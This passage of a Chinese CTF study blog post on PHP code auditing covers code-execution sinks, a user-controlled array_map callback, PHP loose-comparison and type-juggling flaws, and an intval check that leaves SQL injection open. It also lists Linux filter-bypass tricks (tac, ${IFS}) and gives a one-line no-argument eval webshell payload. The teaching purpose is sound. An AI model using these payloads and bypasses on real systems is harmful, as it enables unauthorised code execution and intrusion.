<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$var</span> = <span class="hljs-string">&quot;aaabbbccc $&#123;`ls`&#125;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$foobar</span> = <span class="hljs-string">&quot;phpinfo&quot;</span>;<br>$&#123;<span class="hljs-string">&quot;foobar&quot;</span>&#125;();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="回调函数"><a href="#回调函数" class="headerlink" title="回调函数"></a>回调函数</h3><p>很多函数都可以执行回调函数，当回调函数用户可控时，将导致代码执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$evil_callback</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;callback&quot;</span>];<br><span class="hljs-variable">$some_array</span> = <span class="hljs-keyword">array</span>(<span class="hljs-number">0</span>,<span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>);<br><span class="hljs-variable">$new_array</span> = <span class="hljs-title function_ invoke__">array_map</span>(<span class="hljs-variable">$evil_callback</span>, <span class="hljs-variable">$some_array</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>攻击 payload</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-symbol">http:</span><span class="hljs-comment">//www.a.com/index.php?callback=phpinfo</span><br></code></pre></td></tr></table></figure>

<h3 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h3><p><a href="https://www.sunynov.top/2025/12/24/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">在这儿呢</a></p>
<h2 id="PHP-特性"><a href="#PHP-特性" class="headerlink" title="PHP 特性"></a>PHP 特性</h2><h3 id="数组"><a href="#数组" class="headerlink" title="数组"></a>数组</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$var</span> = <span class="hljs-number">1</span>;<br><span class="hljs-variable">$var</span> = <span class="hljs-keyword">array</span>();<br><span class="hljs-variable">$var</span> = <span class="hljs-string">&quot;string&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>php 不会严格检验传入的变量类型，也可以将变量自由的转换类型。</p>
<p>比如在 <code>$a == $b</code> 的比较中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$a</span> = <span class="hljs-literal">null</span>; <br><span class="hljs-variable">$b</span> = <span class="hljs-literal">false</span>; <span class="hljs-comment">//为真 </span><br><span class="hljs-variable">$a</span> = <span class="hljs-string">&#x27;&#x27;</span>; <br><span class="hljs-variable">$b</span> = <span class="hljs-number">0</span>; <span class="hljs-comment">//同样为真</span><br></code></pre></td></tr></table></figure>

<p>然而，PHP 内核的开发者原本是想让程序员借由这种不需要声明的体系，更加高效的开发，所以在几乎所有内置函数以及基本结构中使用了很多松散的比较和转换，防止程序中的变量因为程序员的不规范而频繁的报错，然而这却带来了安全问题。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">0</span>==<span class="hljs-string">&#x27;0&#x27;</span> <span class="hljs-comment">//true</span><br><span class="hljs-number">0</span> == <span class="hljs-string">&#x27;abcdefg&#x27;</span> <span class="hljs-comment">//true</span><br><span class="hljs-number">0</span> === <span class="hljs-string">&#x27;abcdefg&#x27;</span> <span class="hljs-comment">//false</span><br><span class="hljs-number">1</span> == <span class="hljs-string">&#x27;1abcdef&#x27;</span> <span class="hljs-comment">//true</span><br></code></pre></td></tr></table></figure>

<h3 id="魔法-Hash"><a href="#魔法-Hash" class="headerlink" title="魔法 Hash"></a>魔法 Hash</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-string">&quot;0e132456789&quot;</span>==<span class="hljs-string">&quot;0e7124511451155&quot;</span> <span class="hljs-comment">//true</span><br><span class="hljs-string">&quot;0e123456abc&quot;</span>==<span class="hljs-string">&quot;0e1dddada&quot;</span> <span class="hljs-comment">//false</span><br><span class="hljs-string">&quot;0e1abc&quot;</span>==<span class="hljs-string">&quot;0&quot;</span>  <span class="hljs-comment">//true</span><br></code></pre></td></tr></table></figure>

<p>在进行比较运算时，如果遇到了 <code>0e\d+</code> 这种字符串，就会将这种字符串解析为科学计数法。所以上面例子中 2 个数的值都是 0 因而就相等了。如果不满足 <code>0e\d+</code> 这种模式就不会相等。</p>
<h3 id="十六进制转换"><a href="#十六进制转换" class="headerlink" title="十六进制转换"></a>十六进制转换</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-string">&quot;0x1e240&quot;</span>==<span class="hljs-string">&quot;123456&quot;</span> <span class="hljs-comment">//true</span><br><span class="hljs-string">&quot;0x1e240&quot;</span>==<span class="hljs-number">123456</span> <span class="hljs-comment">//true</span><br><span class="hljs-string">&quot;0x1e240&quot;</span>==<span class="hljs-string">&quot;1e240&quot;</span> <span class="hljs-comment">//false</span><br></code></pre></td></tr></table></figure>

<p>当其中的一个字符串是 <code>0x</code> 开头的时候，PHP 会将此字符串解析成为十进制然后再进行比较，<code>0x1240</code> 解析成为十进制就是 123456，所以与 <code>int</code> 类型和 <code>string</code> 类型的 123456 比较都是相等。</p>
<h3 id="类型转换"><a href="#类型转换" class="headerlink" title="类型转换"></a>类型转换</h3><p>常见的转换主要就是 <code>int</code> 转换为 <code>string</code>，<code>string</code> 转换为 <code>int</code>。</p>
<p><code>int</code> 转 <code>string</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$var</span> = <span class="hljs-number">5</span>;<br>方式<span class="hljs-number">1</span>：<span class="hljs-variable">$item</span> = (<span class="hljs-keyword">string</span>)<span class="hljs-variable">$var</span>;<br>方式<span class="hljs-number">2</span>：<span class="hljs-variable">$item</span> = <span class="hljs-title function_ invoke__">strval</span>(<span class="hljs-variable">$var</span>);<br></code></pre></td></tr></table></figure>

<p><code>string</code> 转 <code>int</code>：<code>intval()</code> 函数。</p>
<p>对于这个函数，可以先看 2 个例子。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-string">&#x27;2&#x27;</span>)) <span class="hljs-comment">//2</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-string">&#x27;3abcd&#x27;</span>)) <span class="hljs-comment">//3</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-string">&#x27;abcd&#x27;</span>)) <span class="hljs-comment">//0</span><br></code></pre></td></tr></table></figure>

<p>说明 <code>intval()</code> 转换的时候，会从字符串的开始进行转换直到遇到一个非数字的字符。即使出现无法转换的字符串， <code>intval()</code> 不会报错而是返回 0。</p>
<p>同时，程序员在编程的时候也不应该使用如下的这段代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$a</span>)&gt;<span class="hljs-number">1000</span>) &#123;<br> <span class="hljs-title function_ invoke__">mysql_query</span>(<span class="hljs-string">&quot;select * from news where id=&quot;</span>.<span class="hljs-variable">$a</span>)<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这个时候 <code>$a</code> 的值有可能是 <code>1002 union</code>。</p>
<h3 id="内置函数的参数的松散性"><a href="#内置函数的参数的松散性" class="headerlink" title="内置函数的参数的松散性"></a>内置函数的参数的松散性</h3><p>内置函数的松散性说的是，调用函数时给函数传递函数无法接受的参数类型。解释起来有点拗口，还是直接通过实际的例子来说明问题，下面会重点介绍几个这种函数。</p>
<p><strong>md5()</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$array1</span>[] = <span class="hljs-keyword">array</span>(<br> <span class="hljs-string">&quot;foo&quot;</span> =&gt; <span class="hljs-string">&quot;bar&quot;</span>,<br> <span class="hljs-string">&quot;bar&quot;</span> =&gt; <span class="hljs-string">&quot;foo&quot;</span>,<br>);<br><span class="hljs-variable">$array2</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;foo&quot;</span>, <span class="hljs-string">&quot;bar&quot;</span>, <span class="hljs-string">&quot;hello&quot;</span>, <span class="hljs-string">&quot;world&quot;</span>);<br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$array1</span>)==<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$array2</span>)); <span class="hljs-comment">//true</span><br></code></pre></td></tr></table></figure>

<p>PHP 手册中的 md5（）函数的描述是 <code>string md5 ( string $str [, bool $raw_output = false ] )</code>，<code>md5()</code> 中的需要是一个 string 类型的参数。但是当你传递一个 array 时，<code>md5()</code> 不会报错，只是会无法正确地求出 array 的 md5 值，这样就会导致任意 2 个 array 的 md5 值都会相等。</p>
<p><strong>strcmp()</strong></p>
<p><code>strcmp()</code> 函数在 PHP 官方手册中的描述是 <code>intstrcmp ( string $str1 ， string $str2 )</code>，需要给 <code>strcmp()</code> 传递 2 个 <code>string</code> 类型的参数。如果 <code>str1</code> 小于 <code>str2</code>，返回 -1，相等返回 0，否则返回 1。<code>strcmp()</code> 函数比较字符串的本质是将两个变量转换为 ASCII，然后进行减法运算，然后根据运算结果来决定返回值。</p>
<p>如果传入给出 <code>strcmp()</code> 的参数是数字呢？</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$array</span>=[<span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>];<br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">strcmp</span>(<span class="hljs-variable">$array</span>,<span class="hljs-string">&#x27;123&#x27;</span>)); <span class="hljs-comment">//null,在某种意义上null也就是相当于false。</span><br></code></pre></td></tr></table></figure>

<p><strong>switch()</strong></p>
<p>如果 <code>switch()</code> 是数字类型的 case 的判断时，switch 会将其中的参数转换为 int 类型。如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$i</span> =<span class="hljs-string">&quot;2abc&quot;</span>;<br><span class="hljs-keyword">switch</span> (<span class="hljs-variable">$i</span>) &#123;<br><span class="hljs-keyword">case</span> <span class="hljs-number">0</span>:<br><span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:<br><span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;i is less than 3 but not negative&quot;</span>;<br> <span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;i is 3&quot;</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这个时候程序输出的是 <code>i is less than 3 but not negative</code> ，是由于 <code>switch()</code> 函数将 <code>$i</code> 进行了类型转换，转换结果为 2。</p>
<p><strong>in_array()</strong></p>
<p>在 PHP 手册中， <code>in_array()</code> 函数的解释是 <code>bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )</code> ,如果strict参数没有提供，那么 <code>in_array</code> 就会使用松散比较来判断 <code>$needle</code> 是否在 <code>$haystack</code> 中。当 strict 的值为 true 时， <code>in_array()</code> 会比较 needls 的类型和 haystack 中的类型是否相同。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$array</span>=[<span class="hljs-number">0</span>,<span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-string">&#x27;3&#x27;</span>];<br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-string">&#x27;abc&#x27;</span>, <span class="hljs-variable">$array</span>)); <span class="hljs-comment">//true</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-string">&#x27;1bc&#x27;</span>, <span class="hljs-variable">$array</span>)); <span class="hljs-comment">//true</span><br></code></pre></td></tr></table></figure>

<p>可以看到上面的情况返回的都是 true，因为 <code>&#39;abc&#39;</code> 会转换为 0， <code>&#39;1bc&#39;</code> 转换为 1。</p>
<p><code>array_search()</code> 与 <code>in_array()</code> 也是一样的问题。</p>
<h2 id="小芝士"><a href="#小芝士" class="headerlink" title="小芝士"></a>小芝士</h2><h4 id="linux命令"><a href="#linux命令" class="headerlink" title="linux命令"></a>linux命令</h4><h5 id="cat被过滤"><a href="#cat被过滤" class="headerlink" title="cat被过滤"></a>cat被过滤</h5><ul>
<li><code>tac</code> 是一个常用的文本处理命令，核心功能是 <strong>反向输出文件内容</strong></li>
<li><code>more</code> 命令是 Linux 系统中用于分页显示文件内容的工具，在处理篇幅较长的文本文件时非常实用</li>
<li><code>less,tail,head</code></li>
</ul>
<h5 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h5><p>&lt;、&gt;、${IFS}、$IFS、$IFS$9</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/2401_84466223/article/details/139408099">CTF中的命令执行绕过方式</a></p>
<h4 id="php"><a href="#php" class="headerlink" title="php"></a>php</h4><p>无参🐎</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">code</span>=<span class="hljs-function"><span class="hljs-title">eval</span>(<span class="hljs-title">array_pop</span>(<span class="hljs-title">next</span>(<span class="hljs-title">get_defined_vars</span>())));&amp;<span class="hljs-number">1</span>=<span class="hljs-title">phpinfo</span>();</span><br></code></pre></td></tr></table></figure>



<p class="note note-success">本文摘自CTF-Wiki，原文基础上有改动</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PHP代码审计</div>
      <div>https://www.sunynov.top/2025/11/08/PHP代码审计/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suny</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年11月8日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/11/15/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SQL注入</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/11/06/%E6%B5%8F%E8%A7%88%E5%99%A8BS%E6%9E%B6%E6%9E%84%E4%B8%8E%E8%AF%B7%E6%B1%82%E5%8C%85%E3%80%81%E8%BF%94%E5%9B%9E%E5%8C%85%E5%8E%9F%E7%90%86/" title="浏览器BS架构与请求包、返回包原理">
                        <span class="hidden-mobile">浏览器BS架构与请求包、返回包原理</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sg2xM2g9UCt39D62pmfzcl8b-gzGzoHsz","appKey":"ludHhVlixZUIrJv11t6rmegp","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://icp.gov.moe/?keyword=20250279" target="_blank">萌ICP备20250279号</a> <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
